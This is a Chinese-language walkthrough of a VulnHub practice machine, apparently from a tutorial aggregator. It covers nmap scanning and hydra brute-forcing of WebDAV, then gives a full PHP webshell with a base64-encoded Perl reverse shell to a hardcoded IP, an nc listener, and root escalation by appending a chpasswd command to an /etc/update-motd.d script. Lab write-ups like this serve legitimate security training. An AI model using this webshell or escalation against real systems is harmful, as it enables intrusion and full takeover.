vulnhub靶场

阅读: 评论:0

vulnhub靶场

vulnhub靶场

1.查找本机ip

输入ifconfig

2.寻找靶机

kali网段:192.168.19.0/24

namp 192.168.19.0/24 知道一个IP 192.168.19.137 端口22 80(每一个电脑靶机IP不一样)

3.在浏览器输入靶机IP,发现是图片

查看页面源代码看是否有有价值的信息

4.如果源代码没有重要信息,扫描整个网络。

发现上传协议webdav,Webdav一种文件传输协议

渗透该协议,发现需要密码

6.暴力破解密码

hydra是一个自动化的爆破工具,暴力破解密码,是一个被迫神器。

语法:Hydra 参数 IP 服务
-l login小写,指定用户名进行破解
-L flie 指定用户名破解·1
-p 小写 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典

注:这里的P和L都是大写

7.在网页中打开192.168.19.137/webdav/webshell.php

输入刚刚破解出来的密码

并且同时把账号密码输入到刚刚的命令中。

8.下载webshell

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.145.128";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

这里给大家安利好了,但要注意把里面的ip改成自己本机的IP。

然后使用put命令进入

9.打开监视

nc -lvvp 4444 这个过程稍微有一点久,但大家的电脑应该会很快,我的比较老了

反弹shell,执行下面命令进入python交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

10.BF解码

当我们进入cat hell.sh会发现有一个弥明之众暗示的特殊符号

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

在虚拟机中打开浏览器输入网址

密码为:chitragupt

先尝试第一个账号referno

发现第一个flag

<提权获得第二个flag

Motd提权
修改文件 、etc/update-motd.d/00-hradcr
1.	进入到文件夹; /etc/update-motd.d/
2.	修改文件: echo 'echo "root:admin" | sudo chpasswd' >> 00-header
3.	重新登陆
4.	su root

找到第二个flag,圆满完成!!!

本文发布于:2024-02-04 22:15:01,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170717619260084.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:靶场   vulnhub
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23